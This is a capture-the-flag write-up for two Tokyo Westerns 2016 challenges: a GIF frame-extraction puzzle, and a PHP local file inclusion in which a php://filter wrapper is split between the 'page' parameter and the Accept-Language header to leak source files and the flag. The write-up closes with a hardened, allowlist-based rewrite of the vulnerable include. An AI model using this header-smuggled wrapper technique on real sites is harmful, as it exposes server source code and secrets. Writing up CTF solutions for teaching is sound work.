TWCTF{Write_up} - Tokyo Westerns/MMA CTF 2nd 2016





Glance - 50 pt
We are given a GIF file and told that the flag is inside it. (You can find the challenge task here.) Investigating it with the Stegsolve tool shows that it has 201 frames, so let's extract them.

convert glance.gif flag.png

The picture is split into pieces, and every piece holds a part of the flag. Let's merge the pieces to get the flag.


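# brace expansion keeps the 201 frames in numeric order (a flag-*.png glob would sort flag-10.png before flag-2.png)
montage flag-{0..200}.png -tile x1 -shadow -geometry +1+1 myflag.png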






Global page - 50 pt
At first sight, it looks like an LFI vulnerability:
curl http://globalpage.chal.ctf.westerns.tokyo/?page=index.php
<!doctype html>
<html>
<head>    

<meta charset=utf-8>
<title>Global Page</title>
<style>
.rtl {
  direction: rtl;
}
</style>
</head>

<body>
<br />
<b>Notice</b>:  Undefined index: HTTP_ACCEPT_LANGUAGE in <b>/var/www/globalpage/index.php</b> on line <b>36</b><br />
<p>
<br />
<b>Warning</b>:  include(indexphp/.php): failed to open stream: No such file or directory in <b>/var/www/globalpage/index.php</b> on line <b>41</b><br />
<br />
<b>Warning</b>:  include(): Failed opening 'indexphp/.php' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in <b>/var/www/globalpage/index.php</b> on line <b>41</b><br />
</p>
</body>
</html>
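Using PHP wrappers :D (php://filter is my bestie). The warnings show that the dot was stripped from page and that the include path is built as <page>/<language>.php, with the language taken from the Accept-Language header, so the php://filter URL can be split across the two inputs: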
curl -H "accept-language:/filter/convert.base64-encode/resource=index" http://globalpage.chal.ctf.westerns.tokyo/?page=php:
Response from the server:
<!doctype html>
<html>
<head>
<meta charset=utf-8>
<title>Global Page</title>
<style>
.rtl {
  direction: rtl;
}
</style>
</head>

<body>
<p>
(Base64-encoded source of index.php)</p>
</body>
</html>
Decoding the Base64 gives the source of index.php:
<?php
if (!defined('INCLUDED_INDEX')) {
define('INCLUDED_INDEX', true);
ini_set('display_errors', 1);
include "flag.php";
?>
<!doctype html>
<html>
<head>
<meta charset=utf-8>
<title>Global Page</title>
<style>
.rtl {
  direction: rtl;
}
</style>
</head>

<body>
<?php
$dir = "";
if(isset($_GET['page'])) {
    $dir = str_replace(['.', '/'], '', $_GET['page']);
}

if(empty($dir)) {
?>
<ul>
    <li><a href="/?page=tokyo">Tokyo</a></li>
    <li><del>Westerns</del></li>
    <li><a href="/?page=ctf">CTF</a></li>
</ul>
<?php
}
else {
    foreach(explode(",", $_SERVER['HTTP_ACCEPT_LANGUAGE']) as $lang) {
        $l = trim(explode(";", $lang)[0]);
?>
<p<?=($l==='he')?" class=rtl":""?>>
<?php
        include "$dir/$l.php";
?>
</p>
<?php
    }
}
?>
</body>
</html>
<?php
}
?>
curl -H "accept-language:/filter/convert.base64-encode/resource=flag" http://globalpage.chal.ctf.westerns.tokyo/?page=php:
We receive the content of flag.php, Base64-encoded:
<html>
<head>

<title>Global Page</title>
<style>
.rtl {
  direction: rtl;
}
</style>
</head>

<body>

PD9waHAKJGZsYWcgPSAiVFdDVEZ7SV9mb3VuZF9zaW1wbGVfTEZJfSI7Cg==<br />

</body>
</html>
Now decode it with base64:
echo "PD9waHAKJGZsYWcgPSAiVFdDVEZ7SV9mb3VuZF9zaW1wbGVfTEZJfSI7Cg==" | base64 -d
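
The root cause in the decoded index.php is that the include path is assembled from two request inputs, and only one of them is filtered. The following is an added example, not code from the challenge or from the original post: a hardened version of that lookup, where the allowlists, the 'en' default and the function names pick_language and resolve_page are assumptions.

```php
<?php
// Added example, not the challenge's code. Allowlists and the 'en' default are assumptions.
const ALLOWED_PAGES = ['tokyo', 'ctf'];   // the two pages linked from index.php
const ALLOWED_LANGS = ['en', 'ja', 'he']; // assumed translations ('he' appears in the source)

// Pick the first Accept-Language tag that is on the allowlist.
function pick_language(string $header): string {
    foreach (explode(',', $header) as $item) {
        $tag = strtolower(trim(explode(';', $item)[0]));
        if (in_array($tag, ALLOWED_LANGS, true)) {
            return $tag;
        }
    }
    return 'en';
}

// Return the file to include, or null when the request must be refused.
function resolve_page(string $base, string $page, string $header): ?string {
    if (!in_array($page, ALLOWED_PAGES, true)) {
        return null; // "php:" never reaches include, so no stream wrapper is parsed
    }
    $root = realpath($base);
    $real = realpath("$base/$page/" . pick_language($header) . '.php');
    if ($root === false || $real === false) {
        return null;
    }
    // Defence in depth: the resolved file must sit under the content root.
    return strncmp($real, $root . DIRECTORY_SEPARATOR, strlen($root) + 1) === 0 ? $real : null;
}

// Constructed content tree so the example runs offline.
$base = sys_get_temp_dir() . '/globalpage_' . getmypid();
foreach (ALLOWED_PAGES as $p) {
    mkdir("$base/$p", 0700, true);
    file_put_contents("$base/$p/en.php", "<?php echo 'hello from $p';");
}

// Constructed inputs: a benign browser header and the header values from the write-up.
$cases = [
    ['tokyo', 'en-US,en;q=0.8'],
    ['php:',  '/filter/convert.base64-encode/resource=index'],
    ['tokyo', '/filter/convert.base64-encode/resource=flag'],
];
foreach ($cases as [$page, $header]) {
    $file = resolve_page($base, $page, $header);
    printf("%-6s %-46s => %s\n", $page, $header, $file ?? 'refused');
}
```

In the request handler, pass $_SERVER['HTTP_ACCEPT_LANGUAGE'] ?? '' as the header, which also avoids the undefined-index notice seen in the first response.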

